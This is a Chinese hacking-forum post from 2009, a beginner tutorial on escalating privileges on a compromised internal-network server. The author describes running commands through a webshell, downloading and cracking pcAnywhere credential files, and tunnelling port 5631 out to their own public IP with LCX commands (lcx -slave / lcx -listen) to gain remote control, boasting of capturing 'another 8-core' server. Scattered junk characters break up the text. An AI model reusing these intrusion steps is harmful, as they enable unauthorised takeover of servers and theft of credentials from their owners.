|
 
- 帖子
- 199
- 积分
- 724
- 威望
- 508
- 金钱
- 10463
- 在线时间
- 185 小时
      
|
很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。# P& s( b. l. ~* |1 k8 @2 @
; R' T$ |4 w% `/ ?/ z c' m2 w
提权方法:pcanywhere+LCX2 W& s/ U7 i! K' b% X- [4 T
/ F, D: Y/ k* u! G7 S$ [ Z
获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。
; k8 Y" N W5 o3 r% O% F8 X8 u- y9 t3 |6 D6 R& G; ^% _% Y6 y* T5 O
在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。
) P- T' w6 i" w6 z( o
: g) P4 X5 \: o- Y
; q3 {; h5 m7 u8 U G0 K, J* ^' y: u查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。
8 N2 P* v1 c* s$ _2 F9 g1 H2 C3 J/ k
/ O% W3 e! |+ Y1 e# n4 k( K+ g呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。
2 |/ Z% K7 Q3 b
* O. _* O- q3 M( Q4 [) V2 ~
& m8 u+ a8 V3 M+ X( j/ K
7 v1 Y! i8 I3 c& a2 o
: C7 s" x; }& G& B7 m! {- W由于服务器在内网,那我们就要做端口转发,又要用到LCX啦``
/ R' p4 f3 y( |* s' x3 Q
( f& Z: c7 j4 |6 a9 e* h! w2 X+ r1 M; d" U7 d- x8 T
LCX的用法再简单说下:
/ |9 B9 z# j, H; \0 E: H! r `' ?- X7 F" ^! L) X
服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口)) e; S' J+ ^; m
% E% [* W# U6 y& }8 S3 p8 U# p
本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口)
Q* E. Z8 i c5 O# q
" C5 ]* {1 b1 N% X- C% ?" a由于我的机器也在内网,LCX 转发端口到本地必须用公网ip,所以我还需要在路由器上简单设置下。8 {$ L7 D9 x/ O+ _
顺便说下如果大家的机器在外网就不必再做端口映射之类的啦`` A- O9 l4 K' X7 Y% I
! ^0 k# ^4 D c5 `7 K% w# g) C
. L+ N1 v. ~" H3 O0 |. U$ g
" t$ a/ \4 s2 S; f5 n) w' v' }2 ^
/ n* s2 M- p" v
呵呵``在连接的过程中出现个小问题,由于我用的是pcanyshell10.5的版本,在连接的时候提示版本过低,那我们就用12.0的版本试下。
2 v! E k5 E7 f: X6 B9 d6 Q) d) u1 ~: c# j$ j& x, J, t
4 M) T; \. U1 e* x0 a" D
# g1 }# Z: u0 T& x `2 F S8 B* k. x2 ?& b+ |
我们本地连接试试,输入我们刚破解的账号密码; j- V, z+ c5 V
3 G& O7 ~6 n& V0 L6 r: p) s
; f3 b* r' s* Q' r6 B* j8 v
呵呵``连接成功,服务器不错,又一个8核^︵^
$ U6 w" L) g5 h& r% P
) J. m' l8 ~0 v7 N4 `1 n% x! }. A C# a& e7 |( j' ?
) w; w1 o- F$ R, S0 J9 ?8 l0 n- z |
附件: 您需要登录才可以下载或查看附件。没有帐号?注册
-
1
评分人数
-
|
发表于 2009-7-5 21:35
| 
发表于 2009-7-5 21:37
| .gif)
